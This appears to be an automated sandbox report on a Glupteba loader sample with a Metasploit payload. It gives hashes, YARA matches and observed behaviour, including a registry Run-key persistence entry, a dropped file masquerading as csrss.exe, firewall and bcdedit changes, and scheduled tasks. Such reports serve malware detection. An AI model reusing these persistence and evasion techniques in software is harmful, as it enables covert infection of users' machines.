glupteba | 5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

General

Target

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Size

3.9MB
MD5

7fc701478f1d43c3e62ff6d9c434ee77
SHA1

790ba947810a29810ca9d5738abc6b03c9805cce
SHA256

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb
SHA512

d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456
SSDEEP

98304:p1q76W1ZJJMknyymHzEnewyOzDFWmrqwKd:pox1Kkny1Xd2Doe5u

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/664-133-0x0000000001320000-0x0000000001B25000-memory.dmp	family_glupteba
behavioral2/memory/664-134-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/664-135-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/3524-138-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/664-139-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/3524-142-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2480-147-0x0000000001800000-0x0000000002005000-memory.dmp	family_glupteba
behavioral2/memory/2480-149-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/3524-148-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2480-150-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 1860 created 664	1860	svchost.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
PID 1860 created 2480	1860	svchost.exe	csrss.exe
PID 1860 created 2480	1860	svchost.exe	csrss.exe
PID 1860 created 2480	1860	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

2480 csrss.exe
4508 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

616 netsh.exe

pid	process
2480	csrss.exe
4508	patch.exe

pid	process
616	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SnowyTree = "\"C:\\Windows\\rss\\csrss.exe\""	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

2320 bcdedit.exe

pid	process
2320	bcdedit.exe

Drops file in Windows directory 2 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
File opened for modification	C:\Windows\rss	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
File created	C:\Windows\rss\csrss.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Program crash 54 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4324	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1408	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3880	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1556	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3152	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4600	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1644	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
224	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3060	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4532	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
984	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4052	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4688	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1088	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3100	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
2472	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4696	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4800	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
928	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1436	664	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3768	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4904	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4984	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3284	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
956	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
2244	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
2248	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4556	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3412	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
2460	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
4468	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
2024	3524	WerFault.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
700	2480	WerFault.exe	csrss.exe
2432	2480	WerFault.exe	csrss.exe
3460	2480	WerFault.exe	csrss.exe
3076	2480	WerFault.exe	csrss.exe
3652	2480	WerFault.exe	csrss.exe
4704	2480	WerFault.exe	csrss.exe
8	2480	WerFault.exe	csrss.exe
3444	2480	WerFault.exe	csrss.exe
3508	2480	WerFault.exe	csrss.exe
364	2480	WerFault.exe	csrss.exe
2056	2480	WerFault.exe	csrss.exe
4296	2480	WerFault.exe	csrss.exe
5040	2480	WerFault.exe	csrss.exe
4428	2480	WerFault.exe	csrss.exe
2012	2480	WerFault.exe	csrss.exe
3532	2480	WerFault.exe	csrss.exe
1088	2480	WerFault.exe	csrss.exe
3100	2480	WerFault.exe	csrss.exe
4152	2480	WerFault.exe	csrss.exe
4684	2480	WerFault.exe	csrss.exe
2940	2480	WerFault.exe	csrss.exe
2800	2480	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3112 schtasks.exe
4332 schtasks.exe

pid	process
3112	schtasks.exe
4332	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

pid	process
664	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
664	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	664	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Token: SeImpersonatePrivilege	664	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Token: SeTcbPrivilege	1860	svchost.exe
Token: SeTcbPrivilege	1860	svchost.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe
Token: SeSystemEnvironmentPrivilege	2480	csrss.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe
Token: SeBackupPrivilege	1860	svchost.exe
Token: SeRestorePrivilege	1860	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exe5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.execmd.execsrss.exe

description	pid	process	target process
PID 1860 wrote to memory of 3524	1860	svchost.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
PID 1860 wrote to memory of 3524	1860	svchost.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
PID 1860 wrote to memory of 3524	1860	svchost.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
PID 3524 wrote to memory of 4348	3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 3524 wrote to memory of 4348	3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 4348 wrote to memory of 616	4348	cmd.exe	netsh.exe
PID 4348 wrote to memory of 616	4348	cmd.exe	netsh.exe
PID 3524 wrote to memory of 2480	3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 3524 wrote to memory of 2480	3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 3524 wrote to memory of 2480	3524	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 1860 wrote to memory of 3112	1860	svchost.exe	schtasks.exe
PID 1860 wrote to memory of 3112	1860	svchost.exe	schtasks.exe
